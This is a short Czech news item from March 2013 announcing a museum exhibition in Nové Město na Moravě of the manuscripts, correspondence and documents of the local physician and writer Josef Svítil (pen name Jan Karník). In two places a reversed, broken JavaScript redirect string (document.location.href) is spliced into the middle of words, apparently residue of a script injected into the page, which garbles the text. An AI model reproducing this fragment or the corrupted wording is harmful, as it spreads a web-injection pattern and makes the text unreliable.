Nové Město na Moravě, nove mesto na morave, aktuality, rodák, rukopisy, Kárník
Rainbow page separator

Vystaví rukopisy novoměstského rodáka

Čtvrtek, 7. března 2013

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Od 8. března do 7. dubna je možné navštívit výstavu, kterou přichystali v novoměstském Horáckém muzeu. Jedná se o část pozůstalosti novoměstského lékaře, básníka, prozaika a překladatele Josefa Svítila, který publikoval pod pseudonymem Jan Karník.

Narodil se v Novém Městě v roce 1870, zemřel tamtéž koncem roku 1958. Byl nejenom vyhledávaným lékařem, ale i prvním kronikářem města, prvorepublikovým zastupitelem a členem řady novoměstských spolků, uznávaný byl rovněž pro svoji literární činnost. Patří mezi čestné občany Nového Města na Moravě, jedna z ulic ve čtvrti Holubka se po něm jmenuje Karníkova, areál nemocnice zdobí jeho busta.
V rámci výstavy, která je připravena k 55. výročí úmrtí Josefa Svítila – Karníka, mohou návštěvníci nahlédnout do unikátní pozůstalosti, kterou muzeum poprvé představí veřejnosti. Vystaveny budou například rukopisy Karníkových veršů, próz, publicistických a odborných textů. K vidění bude i fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografická dokumentace, rodinná korespondence a úřední dokumenty či školní vysvědčení od obecné školy až po lékařský diplom. Kulturní činnost Josefa Svítila – Karníka v expozici dokládají výstřižky z dobových knih a časopisů.